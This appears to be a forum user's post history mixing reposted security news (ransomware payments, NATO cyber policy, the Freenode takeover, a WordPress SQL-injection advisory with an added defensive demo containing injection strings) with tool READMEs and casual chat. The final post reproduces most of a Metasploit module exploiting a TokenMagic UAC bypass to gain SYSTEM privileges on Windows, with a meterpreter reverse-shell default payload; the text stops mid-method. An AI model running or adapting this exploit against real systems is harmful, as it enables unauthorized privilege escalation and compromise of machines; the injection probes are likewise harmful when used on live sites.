

Everything posted by Kev

  1. Or after someone comes back from the launch; from the previews I noticed it is more or less OK, safe.
  2. Hi. A few opinions on Microsoft Windows 11: the security side, software compatibility... etc.
  3. Restore; if they were working, it is possible they updated themselves. Try Restore or Downgrade.
  4. @MrGrj
  5. The age of ransomware raises questions over NATO's policies on state-sponsored cyberattacks and ransomware. Photo: bing.com NATO has updated its stance on what cyberattacks mean and what response is warranted. The North Atlantic Treaty Organization (NATO) – the 30-nation military alliance between North America and Europe – issued a new communique at this week's Brussels summit outlining how it should respond to national security threats. One of them is cyberattacks, as spotted by The Register. The new policy stance follows high-profile attacks on US fuel distribution network Colonial Pipeline – which paid $4 million to ransomware attackers, half of which was later seized by the FBI – and US meat packer JBS, which paid $11 million to ransomware attackers. The tech world is also still reeling from the SolarWinds hack, which compromised the West's top cybersecurity firms, and was attributed to the Russian government. And not so long ago, Russia was blamed for the massive NotPetya ransomware outbreak, while North Korea was blamed for 2017's WannaCry ransomware attack. In the wake of such attacks, NATO has endorsed its "Comprehensive Cyber Defence Policy", which will see the alliance treat cyberattacks on a "case-by-case basis" and may consider them the same as an armed attack. The NATO alliance committed to "impose costs on those who harm us" if it's deemed necessary. However, the policy of Western governments currently is in reality mostly limited to naming and shaming the country launching state-sponsored hacks. Joe Biden attended his first NATO meeting as US president and is set to meet with Russian president Vladimir Putin on Wednesday. Biden is expected to demand Russia does more to tackle cybercrime within its jurisdiction. The Colonial attack was blamed on a Russian-based ransomware-as-a-service operation. China was also in the spotlight at the NATO summit for its cyber capabilities, disinformation campaigns and expansion of power across the globe. 
Via zdnet.com
  6. Hi, are there triple-SIM+ phones (3, 4, 5... SIMs)? If not Samsung, Alcatel or Nokia, made in Tokyo would be fine too.
  7. It's worth it. My mother threw out a Spectrum, a 686 (I think...), a Nintendo; later I found out they are on display in Russia, plus 999+ cassettes. I searched on OLX, the prices they go for give me a headache.
  8. Where do you get the statistics from? I know someone selling everything related to GSA content unique generator. I'll come back with a price after they reply, in case you're interested.
  9. Are you eating plums, @Vlachs? Benny, are you still alive? ON: it indexes you quickly if you have seniority; if you're starving (new), you have no chance.
  10. My opinion: cyberattack -> U.S.A <-> Russia = China
  11. Spot is the virtual hub for your organization– bringing the spirit and utility of being in the same physical office to a digital experience. Instantly create an always-on virtual space for your organization. Naturally move between rooms and conversations. Reduce team friction and increase engagement. Try now for free! Source
  12. FBI Director Christopher Wray speaks during a Senate Select Committee on Intelligence hearing about worldwide threats, on Capitol Hill in Washington, DC, U.S., April 14, 2021. Graeme Jennings/Pool via REUTERS/Files FBI Director Christopher Wray told the Wall Street Journal that the agency is investigating about 100 different types of ransomware, many of which trace back to actors in Russia. In the interview published on Friday, Wray singled out Russia as harboring many of the known users of ransomware. Each of the 100 different malicious software variants are responsible for multiple ransomware attacks in the United States, Wray told the newspaper. The Kremlin on Friday said the FBI director's remark that Russia was a haven for hackers was "emotional", RIA reported. Wray's remarks come days after a cyberattack disrupted much of meatpacker JBS SA's (JBSS3.SA) North American and Australian operations. The White House linked the attack to a Russia-based group. Last month, the biggest U.S. gasoline pipeline Colonial Pipeline, was hit by a ransomware cyberattack, which crippled fuel delivery for several days in the U.S. Southeast. The FBI attributed the cyberattack to a group believed to be based in Russia or Eastern Europe. The U.S. Department of Justice is elevating investigations of ransomware attacks to a similar priority as terrorism, a senior department official told Reuters on Thursday. Ransom software works by encrypting victims' data; typically hackers will offer the victim a key in return for cryptocurrency payments that can run into the hundreds of thousands or even millions of dollars. Via reuters.com
  13. After nine years you still haven't heard of Caller ID Spoofing
  14. Documentation: https://cs01.github.io/termpair
    Source Code: https://github.com/cs01/termpair
    Try It: https://grassfedcode.com/termpair

    What is TermPair?
    TermPair lets developers securely share and control terminals in real time.

    Usage
    Start the TermPair server, or use the one already running at https://grassfedcode.com/termpair.

    >> termpair serve
    INFO: Started server process [15455]
    INFO: Waiting for application startup.
    INFO: Application startup complete.
    INFO: Uvicorn running on http://localhost:8000 (Press CTRL+C to quit)
    INFO: ('127.0.0.1', 35470) - "WebSocket /connect_to_terminal" [accepted]

    Then share your terminal by running:

    >> termpair share --port 8000
    --------------------------------------------------------------------------------
    Running '/bin/bash' and sharing to 'http://localhost:8000/?terminal_id=b26903e19ffff2bc9ace60491e8200d5'.
    Type 'exit' or close terminal to stop sharing.
    --------------------------------------------------------------------------------

    You can share that URL with whoever you want. Note that anyone that has it can view and possibly control your terminal. The server multicasts terminal output to all browsers that connect to the session.

    Security
    Termpair uses AES-GCM 128 bit end-to-end encryption for all terminal input and output.

    How it Works
    Before termpair sends terminal output to the server, it encrypts it using a secret key so the server cannot read it. The server forwards that data to connected browsers. When the browsers receive the data, they use the secret key to decrypt and display the terminal output. Likewise, when a browser sends input to the terminal, it is encrypted in the browser, forwarded from the server to the terminal, then decrypted in the terminal by termpair and written to the terminal's input. The secret key is generated by termpair and embedded in a part of the URL that is not sent to the server.

    Run With Latest Version
    Use pipx to run the latest version without installing:
    Serve: >> pipx run termpair serve
    Then share: >> pipx run termpair share -b   # -b flag opens the browser automatically

    Installation
    You can install using pipx or pip:
    >> pipx install termpair
    or
    >> pip install termpair

    API
    To view the command line API reference, run: >> termpair --help

    System Requirements
    Python: 3.6+
    Operating System:
    To view/control from the browser: All operating systems are supported.
    To run the server (termpair serve): Tested on Linux. Should work on macOS. Might work on Windows.
    To share your terminal (termpair share): Tested on Linux. Should work on macOS. Probably doesn't work on Windows.

    Download termpair-master.zip or git clone https://github.com/cs01/termpair.git
    Source
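    The key-in-the-fragment design described in the post, as an added example that is not termpair's own code: a share URL whose fragment carries the key, the request target the relay server actually receives (no fragment), a relay that forwards frames it cannot read, and a browser that decrypts with the key read back from the fragment. AES-GCM is stood in for by an HMAC-SHA256 counter-mode stream plus an HMAC tag so the block runs on the Python standard library alone; the frame layout (nonce || ciphertext || tag), the RelayServer and Browser classes and the terminal id value are constructed for this example.

```python
"""Added example: end-to-end encrypted terminal relay with the key kept in the URL fragment.

Not termpair's code. AES-GCM is replaced by an HMAC-SHA256 counter-mode stream plus an
HMAC tag (assumption: a stdlib stand-in with the same shape, nonce + ciphertext + tag).
"""
import hashlib
import hmac
import os
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

KEY_BYTES = 16  # 128-bit key, the AES-GCM-128 key size the post names


def build_share_url(base: str, terminal_id: str, key: bytes) -> str:
    """Share URL: terminal id in the query string, secret key in the fragment."""
    return f"{base}/?terminal_id={terminal_id}#{key.hex()}"


def server_view(url: str) -> str:
    """What the relay receives: browsers send path and query, never the fragment."""
    parts = urlsplit(url)
    return urlunsplit(("", "", parts.path, parts.query, ""))


def key_from_url(url: str) -> bytes:
    """The browser-side code reads the key back out of the fragment."""
    return bytes.fromhex(urlsplit(url).fragment)


def _subkey(key: bytes, label: bytes) -> bytes:
    # separate encryption and authentication keys derived from the shared secret
    return hmac.new(key, label, hashlib.sha256).digest()


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    out, block = bytearray(), 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + block.to_bytes(4, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Encrypt-then-MAC one frame: nonce || ciphertext || 16-byte tag."""
    nonce = os.urandom(12) if nonce is None else nonce
    stream = _keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()[:16]
    return nonce + ciphertext + tag


def unseal(key: bytes, frame: bytes) -> bytes:
    """Verify the tag before touching the ciphertext; reject modified or wrong-key frames."""
    if len(frame) < 28:
        raise ValueError("frame too short")
    nonce, ciphertext, tag = frame[:12], frame[12:-16], frame[-16:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ciphertext, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication failed: frame modified or wrong key")
    stream = _keystream(_subkey(key, b"enc"), nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream))


class RelayServer:
    """Multicasts opaque frames to every connected browser; it never holds the key."""

    def __init__(self) -> None:
        self.browsers, self.frames_seen = [], []

    def forward(self, frame: bytes) -> None:
        self.frames_seen.append(frame)
        for browser in self.browsers:
            browser.receive(frame)


class Browser:
    """Decrypts with the key taken from the fragment of the URL it was opened with."""

    def __init__(self, url: str) -> None:
        self.key, self.screen = key_from_url(url), []

    def receive(self, frame: bytes) -> None:
        self.screen.append(unseal(self.key, frame).decode())


def share_session(terminal_output: bytes, key: Optional[bytes] = None) -> dict:
    """One output frame travelling terminal -> relay -> browser (terminal id is constructed)."""
    key = os.urandom(KEY_BYTES) if key is None else key
    url = build_share_url("http://localhost:8000", "0123456789abcdef0123456789abcdef", key)
    relay, browser = RelayServer(), Browser(url)
    relay.browsers.append(browser)
    relay.forward(seal(key, terminal_output))
    return {
        "server_sees": server_view(url),                     # no key in here
        "relay_saw_plaintext": terminal_output in relay.frames_seen[0],
        "browser_screen": "".join(browser.screen),
    }


if __name__ == "__main__":
    print(share_session(b"$ uname -a\n"))
```

    The property worth checking in any such tool is the one server_view() makes visible: the secret must live only in the fragment, because anything in the path or query is logged by the relay and by every proxy in between, and a relay that can read the frames is no longer end-to-end.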
  15. UFO and stuff

    I would call them drones, and one of the first projects was Aurel Vlaicu's, which was not completed because he was assassinated.
  16. Freenode IRC staff resign en masse after takeover by Korea’s “crown prince” Former staffer alleges "a hostile entity is now in control... and has your data." Freenode currently ranges between roughly 75,000 and 90,000 users—that's a far cry from the 240,000 users fellow IRC network QuakeNet had back in 2005, but it's still quite a lot of people. Freenode has been the world's largest IRC network since 2013, with roughly three times as many users as its closest competitor, IRCnet. Last week, the massive IRC network was taken over by tech entrepreneur and "Korean Crown Prince" Andrew Lee—a move that the network's staff has apparently unanimously classified as a "hostile takeover," although Lee himself claims these are only "rumors" and "simply untrue." At first blush, it's tempting for an outside observer—someone who isn't already familiar with the history of the network's ownership and management—to shrug and say "well, who knows." Lee lays out several hundred words of explanation in a blog post currently featured on Freenode's front page—most of which sounds reasonable. But the one question Lee never addresses—let alone answers—is why at least 14 separate staff members would quit en masse, all disagreeing with the story he tells. A dubious contract In 2017, Christel Dahlskjaer—who was, at the time, head of Freenode staff—created a corporation, Freenode Ltd., which she immediately sold to Lee. Dahlskjaer and Lee told Freenode staff and users that the incorporation was only done as necessary paperwork in order to sponsor a conference and that day-to-day operations would remain unchanged. Contract or no contract, staff and developers of Freenode maintain that it wasn't actually possible to sell the network—the staff is all volunteers, and the infrastructure itself wasn't owned by Dahlskjaer in the first place. According to resigning Freenode developer Aaron Jones, however, "Andrew has more money than us, and so we cannot fight this." 
Although the contract in question was signed in 2017, staffers didn't begin objecting until this year, when operational changes began appearing without their control or consent. A unilateral decision on advertising In February 2021, Dahlskjaer placed the logo for Shells—a Lee-owned company offering cloud-based virtual desktops—prominently on Freenode's front page. By itself, this might seem innocuous—FOSS projects accept sponsorships and advertising all the time. But staffers, who were supposedly still in control of the network, weren't consulted about the arrangement—and they did not approve. One reason for staffers' virulent disapproval is Shells CTO Mark Karpelès. Karpelès is the founder of the defunct Mt. Gox bitcoin exchange, which lost nearly 850,000 bitcoin (currently worth a staggering $33.4 billion-with-a-B US dollars) to attackers who exploited a massive security flaw. Karpelès was found guilty in a Tokyo court of deliberately tampering with records to cover up the exchange's various losses, although he was found innocent of outright embezzlement. As former staffer Aaron Jones explains in his lengthy letter of resignation—which links to similar announcements from other departing high-profile staffers—this wasn't the only issue with the new ad. According to Jones, sponsorships are normally only found at freenode.net/acknowledgements—making the prominent Shells logo in the upper right of Freenode's front page more of a departure from the norm than it might seem. Jones goes on to say that Dahlskjaer was either unable or unwilling to explain the sudden new ad to staffers, choosing to resign instead. (Lee claims that Freenode staff "harassed" Dahlskjaer into resignation; Jones and other departing staffers deny this characterization.) Freenode staff elected Tom Wesley (aka tomaw) to replace her. 
Escalation in April Beginning in April 2021, Lee's exercise of control continued ramping up: Staffers created a blog post outlining changes in leadership and announcing a change to newly developed back-end ircd software Solanum. According to Jones, Lee summarily removed the post—and manually edited the website's built-in history to create the impression that it had never existed. Later in April, a Freenode test network—in use to get ready for the infrastructure shift to Solanum—was shut down without discussion. Wesley (tomaw) performed the shutdown and refused to say why; Jones and others believe Lee was behind the shutdown, used threat of legal force to make Wesley comply, and issued related gag orders to OFTC staff. Lee registered the channel #freenode-board without discussing it with staff—and, according to Jones, without proper authority (since only official group contacts are allowed to create channels in Freenode's primary namespace, and Lee was not an official Freenode contact). Shane Allen (aka nirvana), an associate and employee of Lee's, bragged about "turning" tomaw, and he attempted to bribe prominent user Ariadne with promises of ops privileges, saying, "I'll make sure you get +o0 in #freenode so you can kick people. My gift to you pal." On May 11, Lee began issuing notices to staff as a group and directly to individual Freenode staffers. Everything came from "the board"—an entity that staffers say never existed, and even now is merely a euphemism for Lee himself. On May 12, Lee (aka rasengan) posted his version of events—in which he claims legal ownership of Freenode, along with a list of grievances—in a Github gist. (The gist is considerably saltier than the version of events Lee posted to Freenode's public-facing blog a week later.) Libera Chat A week after Lee's effectively public announcement of ownership and de facto dictatorial operation of Freenode, the staffers who resigned from Freenode created Libera.chat as a replacement. 
Libera Chat is incorporated as a Swedish nonprofit organization, owned and operated by volunteer staffers who are voting members of the organization. It has a small, member-elected board—currently consisting of chair, treasurer, projects and community rep, engineering rep/vice chair, and operations rep. But most decisions are to be taken by the membership as a whole. The membership also elects two auditors, tasked with auditing the board's actions on behalf of the membership. A transparency report is to be published annually, detailing bookkeeping and the auditors' findings along with the standard annual report from the board itself. All current Libera Chat boardmembers and auditors are Freenode staffers who resigned in protest of Lee's recent actions and assumption of control. Via arstechnica.com
  17. Hi. I got indexed in all the search engines (Bing, Google... etc.) with a "free html/css template" meta tag; I edited the whole site, including the (c), and it has been up for 4-5 days with the same tag. What can I do? Thanks in advance.
  18. ^ off: me too; cut him so the Indian learns to read. on: interesting parameters, anyway it's fixed.
  19. macOCR

    macOCR is a command line app that enables you to turn any text on your screen into text on your clipboard. When you invoke the ocr command, a "screen capture" like cursor is shown. Any text within the bounds will be converted to text. You could invoke the app using the likes of Alfred.app, Hammerspoon, Quicksilver etc. An example Alfred.app workflow is available here. If you're still wondering "how does this work?", I always find the .gif is the best way to clarify things.

    Installation
    Compile the code in this repo, or download a prebuilt binary (Apple Silicon, Intel) and put it on your path.
    Apple Silicon Install: curl -O https://files.littlebird.com.au/ocr.zip; unzip ocr.zip; sudo cp ocr /usr/local/bin;
    Intel Install: curl -O https://files.littlebird.com.au/ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; unzip ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; sudo cp ocr /usr/local/bin;
    When running the app the first time, you will likely be asked to allow the app access to your screen.

    OS Support
    This should run on Catalina and above.

    Who made this?
    macOCR was made by Marcus Schappi. I create software (and even hardware) to automate ecommerce, including: Chick Commerce, this free Australia Post app on Shopify; Script Ninja, which enables you to create powerful scripts and tools to automate your Shopify store.

    Thoughts on Sherlocking?
    Apple, please sherlock this software!

    MIT License
    Copyright 2021 Marcus Schappi
    Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download macOCR-master.zip or git clone https://github.com/schappim/macOCR.git Source
  20. The plugin, installed on hundreds of thousands of sites, allows anyone to filch database info without having to be logged in. WP Statistics, a plugin installed on more than 600,000 WordPress websites, has an SQL-injection security vulnerability that could let site visitors make off with all kinds of sensitive information from web databases, including emails, credit-card data, passwords and more. WP Statistics, as its name suggests, is a plugin that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymized data around IP addresses, referring sites, and country- and city-level details for visitors, all presented in the form of charts and graphs. Wordfence researchers found the high-severity bug (tracked as CVE-2021-24340, rating 7.5 out of 10 on the CVSS scale) in the “Pages” function, which lets administrators see which pages have received the most traffic. It returns this data using SQL queries to a back-end database – but it turns out that unauthenticated attackers can hijack the function to perform their own queries, in order to purloin sensitive information. The specific vulnerability is a time-based blind SQL injection, according to researchers at Wordfence. This technique involves sending requests to the database that “guess” at the content of a database table and instruct the database to delay the response or “sleep” if that guess is correct. For instance, an attacker could ask the database if the first letter of the admin user’s email address starts with the letter “A,” and instruct it to delay the response by five seconds if this is true. The only reliable method of preventing SQL injection is to prepare all SQL statements before executing them, researchers added. 
Prepared statements isolate each query parameter so that an adversary would not be able to see the entire scope of the data that’s returned. VeronaLabs, the plugin’s developer, has released a patch with version 13.0.8, so site administrators should update as quickly as possible. A similar bug was found earlier in May, which impacted the “Spam protection, AntiSpam, FireWall by CleanTalk” plugin, which is installed on more than 100,000 sites. It too allowed adversaries to use the time-based blind SQL approach, also without having to be logged on to mount an attack. Via threatpost.com
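    The contrast the article draws between concatenated SQL and prepared statements, as an added example that is not WP Statistics or WordPress code: a page-visits lookup in the shape of the "Pages" function, written both ways and run against a constructed SQLite database. Table names, rows and the sample email are all constructed; SQLite has no SLEEP(), so the boolean form of the oracle (row present or absent) stands in for the time-based one the article describes.

```python
"""Added example (not WP Statistics code): the same per-page lookup written with string
concatenation and with a prepared statement, against a constructed SQLite database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a per-page visit table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page_visits (page TEXT, visits INTEGER)")
    conn.executemany("INSERT INTO page_visits VALUES (?, ?)",
                     [("/", 120), ("/about", 45), ("/contact", 12)])
    conn.execute("CREATE TABLE users (email TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin@example.com')")  # constructed value
    conn.commit()
    return conn


def visits_concatenated(conn: sqlite3.Connection, page: str):
    """Vulnerable pattern: the request parameter becomes part of the SQL text,
    so quotes and operators inside it change what the query means."""
    sql = "SELECT page, visits FROM page_visits WHERE page = '" + page + "'"
    return conn.execute(sql).fetchall()


def visits_prepared(conn: sqlite3.Connection, page: str):
    """Prepared statement: the parameter is bound as a value after the statement is
    compiled, so whatever it contains is compared as a page name and nothing else."""
    return conn.execute(
        "SELECT page, visits FROM page_visits WHERE page = ?", (page,)
    ).fetchall()


def compare(conn: sqlite3.Connection, page: str) -> dict:
    """Run both versions on the same input so the difference is side by side."""
    return {"concatenated": visits_concatenated(conn, page),
            "prepared": visits_prepared(conn, page)}


if __name__ == "__main__":
    db = make_db()
    # a legitimate request: both versions agree
    print(compare(db, "/about"))
    # a tautology: concatenation returns every row, the bound parameter matches nothing
    print(compare(db, "/about' OR '1'='1"))
    # the per-character oracle the article describes: with concatenation the /about row
    # comes back only when the guessed first letter of the stored email is right; the
    # prepared version returns nothing either way because the input is just a page name
    print(compare(db, "/about' AND substr((SELECT email FROM users), 1, 1) = 'a"))
```

    In a WordPress plugin the prepared form is `$wpdb->prepare()` with placeholders, applied to every value that originates from the request, including ones only administrators are expected to send; the article's point is that the vulnerable endpoint was reachable without logging in at all, so "trusted caller" assumptions about parameters do not hold.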
  21. The CNA headquarters in Chicago. Photographer: AYNSLEY FLOYD/Bloomberg CNA Financial Corp., among the largest insurance companies in the U.S., paid $40 million in late March to regain control of its network after a ransomware attack, according to people with knowledge of the attack. The Chicago-based company paid the hackers about two weeks after a trove of company data was stolen, and CNA officials were locked out of their network, according to two people familiar with the attack who asked not to be named because they weren’t authorized to discuss the matter publicly. In a statement, a CNA spokesperson said the company followed the law. She said the company consulted and shared intelligence about the attack and the hacker’s identity with the FBI and the Treasury Department’s Office of Foreign Assets Control, which said last year that facilitating ransom payments to hackers could pose sanctions risks. In a security incident update published on May 12, CNA said it did “not believe that the systems of record, claims systems, or underwriting systems, where the majority of policyholder data – including policy terms and coverage limits – is stored, were impacted.” Ransomware attacks -- and particularly payments -- are rarely disclosed so it’s difficult to know what the biggest ransoms have been. The average payment in 2020 was $312,493, according to Palo Alto Networks, a 171% increase over the previous year. The $40 million payment is bigger than any previously disclosed payments to hackers, according to three people familiar with ransomware negotiations. The CNA hackers used malware called Phoenix Locker, a variant of ransomware dubbed ‘Hades.’ Hades was created by a Russian cybercrime syndicate known as Evil Corp., according to cybersecurity experts. Evil Corp. was sanctioned by the U.S. in 2019. However, attributing attacks can be difficult because hacking groups can share code or sell malware to one another. 
CNA, which offers cyber insurance, said its investigation concluded that the hackers were a group called Phoenix that isn’t subject to U.S. sanctions. Disclosure of the payment is likely to draw the ire of lawmakers and regulators already unhappy that U.S. companies are making large payouts to criminal hackers who over the last year have targeted hospitals, drug makers, police forces and other entities critical to public safety. The FBI discourages organizations from paying ransom because it encourages additional attacks and doesn’t guarantee data will be returned. Ransomware is a type of malware that encrypts a victim’s data. Cybercriminals using ransomware often steal the data too. The hackers then ask for a payment to unlock the files and promise not to leak stolen data. In recent years, hackers have been targeting victims with cyber insurance policies and huge volumes of sensitive consumer data that make them more likely to pay a ransom, according to cybersecurity experts. Last year was a banner year for ransomware groups, according to a task-force of security experts and law enforcement agencies which estimated that victims paid about $350 million in ransom last year, a 311% increase over 2019. The task force recommended 48 actions that the Biden administration and private sector could take to mitigate such attacks, including better regulation of the digital currency market used to make ransom payments. The report, prepared by the Institute for Security and Technology, was delivered to the White House days before Colonial Pipeline Co. was compromised in a ransomware attack that led to fuel shortages and long lines at gas stations along the East Coast of the U.S. Bloomberg reported that Colonial paid the hackers nearly $5 million shortly after the attack; Colonial Chief Executive Officer Joseph Blount, in an interview with the Wall Street Journal published on Wednesday, confirmed that the company paid the hackers -- $4.4 million in ransom. 
Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom According to the two people familiar with the CNA attack, the company initially ignored the hackers’ demands while pursuing options to recover their files without engaging with the criminals. But within a week, the company decided to start negotiations with the hackers, who were demanding $60 million. Payment was made a week later, according to the people. Via bloomberg.com
  22. WunderGraph Realtime Chat Example using NextJS, TypeScript & PostgreSQL Description This Example demonstrates how to build a production-grade Realtime Chat application by writing two GraphQL Queries. Features: Authentication Authorization Realtime Updates Cross Tab Login/Logout typesafe generated Typescript Client Prerequisites Make sure you have docker compose installed. Alternatively, you can use any PostgreSQL database available on localhost. Getting Started Install the dependencies and run the example: yarn global add @wundergraph/wunderctl@latest yarn yarn dev Questions? Read the Docs. Join us on Discord! Download: nextjs-typescript-postgresql-realtime-chat-main.zip or git clone https://github.com/wundergraph/nextjs-typescript-postgresql-realtime-chat.git Source
  23. This Metasploit module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE # Needed for generate_payload_dll
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::FileSystem
  include Msf::Post::Windows::Powershell
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Privilege Escalation via TokenMagic (UAC Bypass)',
        'Description' => %q{
          This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL
          hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'James Forshaw', # Research
          'Ruben Boonen (@FuzzySec)', # PoC
          'bwatters-r7', # msf module
          'jheysel-r7' # msf module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-05-25',
        'References' => [
          ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
        ],
        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
        'DefaultOptions' => {
          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
          'WfsDelay' => 900
        }
      )
    )

    register_options([
      OptString.new('SERVICE_NAME', [false, 'Service Name to use (Random by default).', Rex::Text.rand_text_alpha(5..9)]),
      OptString.new('WRITABLE_DIR', [false, 'Directory to write file to (%TEMP% by default).', nil]),
      OptString.new('SERVICE_FILENAME', [false, 'Filename for Service Payload (Random by default).', Rex::Text.rand_text_alpha(5..9)]),
      OptEnum.new('METHOD', [
        true,
        'SERVICE or DLL, please select which attack method you would like to use (SERVICE by default). Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger',
        'SERVICE',
        ['SERVICE', 'DLL']
      ])
    ])
  end

  def setup_process
    begin
      print_status('Launching notepad to host the exploit...')
      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    process
  end

  def inject_magic(process)
    if sysinfo['Architecture'] == ARCH_X64
      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll')
    elsif sysinfo['Architecture'] == ARCH_X86
      library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll')
    end
    library_path = ::File.expand_path(library_path)

    print_status("Reflectively injecting the trigger DLL into #{process.pid}...")
    dll = ::File.read(library_path)
    exploit_mem, offset = inject_dll_data_into_process(process, dll)
    print_good('Trigger injected.')
    payload_mem = inject_into_process(process, payload.encoded)
    print_good('Payload injected. Starting thread...')
    process.thread.create(exploit_mem + offset, payload_mem)
  end

  def launch_dll_trigger
    print_status('Trying to start notepad')
    process = setup_process
    inject_magic(process)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  rescue Rex::Post::Meterpreter::RequestError => e
    elog(e)
    print_error(e.message)
  end

  def payload_arch
    payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86
  end

  def exploit
    win_dir = session.sys.config.getenv('windir')
    cmd_path = "#{win_dir}\\system32\\cmd.exe"

    if datastore['SERVICE_FILENAME']
      service_filename = datastore['SERVICE_FILENAME']
    else
      service_filename = Rex::Text.rand_text_alpha(5..9)
    end
    service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')

    if datastore['SERVICE_NAME']
      service_name = datastore['SERVICE_NAME']
    else
      service_name = Rex::Text.rand_text_alpha(5..9)
    end

    if datastore['WRITABLE_DIR']
      writable_dir = datastore['WRITABLE_DIR']
    else
      writable_dir = session.sys.config.getenv('TEMP')
    end

    if datastore['METHOD'] =~ /DLL/i
      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
      payload = generate_payload_dll
      vprint_status("Payload DLL is #{payload.length} bytes long")
      client.core.use('powershell') unless client.ext.aliases.include?('powershell')
      # Register this file for cleanup so that if we fail, then the file is cleaned up.
      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll')
      # Replace Value in Generic Script.
      cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll"
    else
      bin_path = "#{writable_dir}\\#{service_filename}"
      payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
      vprint_status("Service Name = #{service_name}")
      client.core.use('powershell') unless client.ext.aliases.include?('powershell')
      # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
      cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
    end

    # Check target
    print_status('Checking Target')
    validate_active_host
    validate_payload

    # Upload the payload
    print_status("Uploading payload to #{bin_path}")
    write_file(bin_path, payload)
    register_file_for_cleanup(bin_path)

    # Read in Generic Script
    script = exploit_data('tokenmagic', 'tokenmagic.ps1')
    script.gsub!('_CMD_PATH_', cmd_path)
    script.gsub!('_CMD_ARGS_', cmd_args)

    # Run Exploit Script
    print_status("Running Exploit on #{sysinfo['Computer']}")
    begin
      print_status('Executing TokenMagic PowerShell script')
      session.powershell.execute_string({ code: script })
    rescue Rex::TimeoutError => e
      elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
      print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
    end

